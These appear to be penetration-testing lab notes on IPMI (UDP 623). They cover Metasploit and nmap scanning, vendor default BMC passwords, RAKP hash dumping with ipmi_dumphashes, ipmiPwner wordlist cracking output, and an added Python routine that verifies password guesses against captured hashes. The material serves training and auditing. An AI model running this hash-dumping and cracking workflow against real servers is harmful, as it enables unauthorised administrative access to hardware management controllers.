IPMI (623 UDP)
Theory
Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management and monitoring. It runs as an autonomous subsystem that works independently of the host's BIOS, CPU, firmware, and operating system, so sysadmins can manage and monitor systems even when they are powered off or unresponsive.
Version
sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options
Module options (auxiliary/scanner/ipmi/ipmi_version):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
msf6 auxiliary(scanner/ipmi/ipmi_version) > run
[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Default passwords
Product          Username        Password
Dell iDRAC       root            calvin
HP iLO           Administrator   randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI  ADMIN           ADMIN
Metasploit Wordlists
ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txt
Get password
Hashes
Metasploit Dumping Hashes
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt yes File containing common passwords for offline cracking, one per line
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt yes File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

cat ipmi.txt
a870af384080000fcb12dffed486b2d2307f417d3261a28f099e9b1b0fe99d1f77f2b940cfba668a123456789abcdefa123456789abcdef140561646d696e:9d0c8a64d4b9cf7482ba54a9056e6b147777e025
I don't know why but hashcat didn't find the password :(
ipmiPwner
[Apr 06, 2024 - 05:26:05 (EDT)] exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash
[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
\_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python
[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #
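The Metasploit `user:salt:digest` lines, the hashcat-style `salt:digest` file and the `$rakp$` line from ipmiPwner all carry the same RAKP message 2 material. The following is an added example, not code from the page or from either tool: it parses the three formats, decodes the salt into its RAKP fields (layout from the IPMI 2.0 specification; the role-byte reading is my interpretation of it), and checks candidate passwords against the digest the way the crackers above do. All function names are my own and the sample line at the bottom is constructed.

```python
import hashlib
import hmac

# RAKP message 2 (IPMI 2.0, RAKP-HMAC-SHA1): the BMC keys an HMAC with the user's
# password and hands it to any client that names a valid user, before that client has
# proven anything; every dumped line can therefore be guessed against offline.
# Salt layout: SIDm(4) SIDc(4) Rm(16) Rc(16) GUIDc(16) RoleM(1) ULength(1) UName(ULength)
# (m = remote console, c = managed system / BMC).
ROLE_OFF, ULEN_OFF, UNAME_OFF = 56, 57, 58

def parse_hash(line: str) -> tuple:
    """Return (salt, digest) from '[user:]salthex:digesthex' (ipmi_dumphashes / hashcat 7300)
    or '$rakp$salthex$digesthex' (john / ipmipwner). Raises ValueError on malformed hex."""
    line = line.strip()
    if line.startswith("$rakp$"):
        salt_hex, digest_hex = line[len("$rakp$"):].split("$")
    else:
        salt_hex, digest_hex = line.split(":")[-2:]  # optional leading 'user:' is ignored
    salt, digest = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)  # odd length -> ValueError
    if len(digest) != 20 or len(salt) <= UNAME_OFF or len(salt) != UNAME_OFF + salt[ULEN_OFF]:
        raise ValueError("salt/digest length does not match the RAKP layout")
    return salt, digest

def decode_salt(salt: bytes) -> dict:
    """Split the salt into its RAKP fields; note that the username travels in clear."""
    return {"sid_m": salt[0:4].hex(), "sid_c": salt[4:8].hex(), "r_m": salt[8:24].hex(),
            "r_c": salt[24:40].hex(), "guid_c": salt[40:56].hex(),
            "role": salt[ROLE_OFF],  # 0x14 = name-only lookup + Administrator privilege
            "uname": salt[UNAME_OFF:UNAME_OFF + salt[ULEN_OFF]].decode("ascii")}

def verify(salt: bytes, digest: bytes, password: str) -> bool:
    """True if HMAC-SHA1 keyed with this password reproduces the BMC's digest."""
    mac = hmac.new(password.encode(), salt, hashlib.sha1).digest()
    return hmac.compare_digest(mac, digest)

def audit(line: str, candidates):
    """Password-policy check: first candidate that reproduces the digest, else None."""
    salt, digest = parse_hash(line)
    return next((p for p in candidates if verify(salt, digest, p)), None)

def build_salt(sid_m: bytes, sid_c: bytes, r_m: bytes, r_c: bytes, guid_c: bytes,
               role: int, uname: str) -> bytes:
    """Assemble a salt in RAKP layout (used to construct the self-checking sample)."""
    return sid_m + sid_c + r_m + r_c + guid_c + bytes([role, len(uname)]) + uname.encode()

# Constructed sample, not captured from a real BMC: user "admin", password "Winter2024".
_SALT = build_salt(b"\x01\x02\x03\x04", b"\x02\x04\x00\x00", bytes(range(16)),
                   bytes(range(16, 32)), b"\xaa" * 16, 0x14, "admin")
SAMPLE_LINE = "admin:%s:%s" % (_SALT.hex(), hmac.new(b"Winter2024", _SALT, hashlib.sha1).hexdigest())
```

A salt whose hex is odd-length or shorter than 58 + ULength bytes is rejected up front, so a hash that was copied incompletely is reported as malformed instead of silently never matching any wordlist.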
Resources
Interesting Books
Nmap Network Scanning The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.
The Art of Network Penetration Testing A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
Network Basics for Hackers The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.